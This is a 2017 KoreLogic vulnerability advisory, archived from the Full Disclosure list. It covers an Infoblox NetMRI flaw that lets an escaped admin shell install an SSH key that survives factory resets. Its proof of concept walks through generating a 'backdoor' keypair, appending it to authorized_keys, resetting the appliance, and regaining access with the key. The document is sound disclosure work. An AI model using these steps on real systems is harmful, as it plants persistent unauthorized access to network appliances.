lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 24 Oct 2017 14:05:28 -0500
From: KoreLogic Disclosures <disclosures@...elogic.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory
 Reset Persistence

KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory Reset Persistence

Title: Infoblox NetMRI Administration Shell Factory Reset Persistence
Advisory ID: KL-001-2017-018
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-018.txt


1. Vulnerability Details

     Affected Vendor: Infoblox
     Affected Product: NetMRI
     Affected Version: VM-AD30-5C6CE
     Platform: Embedded Linux
     CWE Classification: CWE-485: Insufficient Encapsulation
     Impact: Administrative Account Backdoor
     Attack vector: SSH

2. Vulnerability Description

     An authenticated user who has escaped the management shell
     can install a public SSH key which will survive factory resets.

3. Technical Description

     1. Create a SSH keypair.

         $ ssh-keygen -f netrmi-backdoor
         Generating public/private rsa key pair.
         Enter passphrase (empty for no passphrase):
         Enter same passphrase again:
         Your identification has been saved in netrmi-backdoor.
         Your public key has been saved in netrmi-backdoor.pub.
         The key fingerprint is:
         1e:d6:55:7b:f6:a1:a5:9f:ea:8d:2b:4d:5d:ae:9e:19 fake@...e
         The key's randomart image is:
         +--[ RSA 2048]----+
         |              .  |
         |             . . |
         |            . .oo|
         |         . .  +o+|
         |        S .  o..o|
         |       o .   ...o|
         |        .   o E+ |
         |           . .=+ |
         |            o*=. |
         +-----------------+

     2. As 'admin' from a escaped shell, echo the public key to authorized_keys.

         [admin@...MRI-VM-AD30-5C6CE ~]$ echo ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDmjcavayYmGgsNUggeILWSw8qGKAZeWkH/01oP/1M8d249zYBJRHri0hJn13DItuOCn/1/RWxFQsUtoph2dHsAnOYPZXEXofPfmWbqOdaOOK+TbrMAgc0CdgKtIDE01LHob4S8s4N//jCHGWUQzv5KAUebRUtR1K7STAQdMnKbhZeoUBoVgvekjnZZ+3gFGg6C7FDg3Z8VstWYJmqxo7N4awEI95fnJ551O4sr9owdIwoZ5OhO0cbt8HGzoCsdbinICKUg3CIhfnmLnNfHtySmBf6srFx7QQ3Gy5lmW7nXNEYrDoXc37H+mpSR0rtPtuWr9GolP9ccHbbIyQXL6frV
fake@...e >> /home/admin/.ssh/authorized_keys
         [admin@...MRI-VM-AD30-5C6CE ~]$ exit
         exit
         [admin@...MRI-VM-AD30-5C6CE Backup]$ exit
         exit
         ping: IDN encoding of '' failed with error code 5

     3. Factory reset the system using the management shell.

         NetMRI-VM-AD30-5C6CE> ?

         Available Commands:
           acl         ftp               md5sum           register    setup
           autoupdate  grep              more             remoteCopy  show
           cat         halt              netstat          removedsb   snmpwalk
           clear       help              ping             removemib   ssh-key
           configure   installdsb        provisiondisk    repair      supportbundle
           debug       installhelpfiles  quit             reset       telnet
           deregister  installmib        rdtclient        restore     tftpsync
           diagnostic  license           reboot           rm          top
           exit        ls                recalculate-spm  route       traceroute
           export      maintenance       refreshgroups    set

         NetMRI-VM-AD30-5C6CE> reset

         Reset Commands:
           admin         cli         snmp        tunclient
           all_licenses  database    system

         NetMRI-VM-AD30-5C6CE> reset system

         *******************************************************************
               WARNING    WARNING    WARNING    WARNING    WARNING

         This script deletes the network database, all database archive
         files, all server logs, all issue details, all files stored
         in the administrator shell directory and all user logins.
         This script also resets the administrator password to 'admin'
         and erases all customer-specific configuration information.

               WARNING    WARNING    WARNING    WARNING    WARNING
         *******************************************************************

         Do you really want to reset (y|n)? [n]y

         +++ Stopping Server ...
         +++ Clearing MQ data ...
         +++ Removing Server Logs ...
         +++ Removing User Logins ...
         +++ Resetting Admin Password ...
         +++ Clearing Network Database ...
         +++ Clearing All Config Files ...
         +++ Clearing subscribers and subscriptions ...
         +++ Clearing reports ...
         +++ Clearing device support bundles ...
         +++ Removing Certificates ...
         +++ Rebuilding database ...
         +++ Restoring pre-packaged policies ...
         +++ Resetting Server Configuration ...
         Server is down, skipping comm server restart
         +++ Installing Weekly Maintenance Process ...
         +++ Resetting Server Name ...
         +++ Resetting Banner Logo ...
         +++ Resetting Network Interfaces ...
         +++ Processing Interface eth0 ...
         +++ Processing Interface eth1 ...
         +++ Processing Interface eth2 ...
         +++ Processing Interface eth3 ...
         +++ Resetting DNS Configuration ...
         +++ Clearing Admin Directory ...
         +++ Resetting Firewall Settings ...
         +++ Resetting Time Zone ...
         +++ Resetting Security Settings ...

         #############################################################
         The system needs to be rebooted to complete the reset process
         #############################################################

         Enter 'reboot' or 'halt' [reboot]: reboot
         +++ Reset Complete

         +++ Rebooting System ...

         Broadcast message from admin@...MRI-VM-AD30-5C6CE on pts/0 (Mon, 13 Mar 2017 18:59:02 -0400):

         The system is going down for reboot NOW!

         Connection to 1.3.3.7 closed by remote host.

     4. Login to the system using the private key.

         $ ssh -i netrmi-backdoor admin@....3.7
         NetMRI VM-AD30-5C6CE
         ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.
         Last login: Mon Mar 13 17:00:07 2017 from 1.3.3.7

         ************************************************************************
         ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM
         EXTENT ALLOWED BY APPLICABLE LAWS.
         ************************************************************************

                         NetMRI Administrative Shell
                         ---------------------------

         Available Commands:
           acl         ftp               md5sum           register    setup
           autoupdate  grep              more             remoteCopy  show
           cat         halt              netstat          removedsb   snmpwalk
           clear       help              ping             removemib   ssh-key
           configure   installdsb        provisiondisk    repair      supportbundle
           debug       installhelpfiles  quit             reset       telnet
           deregister  installmib        rdtclient        restore     tftpsync
           diagnostic  license           reboot           rm          top
           exit        ls                recalculate-spm  route       traceroute
           export      maintenance       refreshgroups    set

         NetMRI-VM-AD30-5C6CE>

4. Mitigation and Remediation Recommendation

     There is no known remediation for this vulnerability from the
     vendor. Administrators should heavily restrict access to any
     account of any privilege which can use the ping command in
     the NetMRI CLI.

     Network access to management interfaces should be properly segmented.

     Assuming the lack of input sanitation in the NetMRI CLI is not
     addressed: Use that vulnerability to check for the existence
     any SSH keys. No keys should be present.

5. Credit

     This vulnerability was discovered by Matt Bergin (@...tguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2017.07.21 - KoreLogic requests security contact and PGP key from
                  Infoblox.
     2017.07.21 - Infoblox suggests 'security_support@...oblox.com' with
                  PGP key id 0xC4AB2799.
     2017.07.24 - KoreLogic submits vulnerability information to Infoblox.
     2017.07.31 - 5 business days have elapsed since the vulnerability
                  was reported. No response from Infoblox.
     2017.09.15 - KoreLogic requests update from Infoblox.
     2017.09.26 - 45 business days have elapsed since the vulnerability
                  was reported to Infoblox.
     2017.10.17 - KoreLogic requests an update from Infoblox.
     2017.10.18 - 60 business days have elapsed since the vulnerability
                  was reported to Infoblox.
     2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt


Download attachment "signature.asc" of type "application/pgp-signature" (526 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ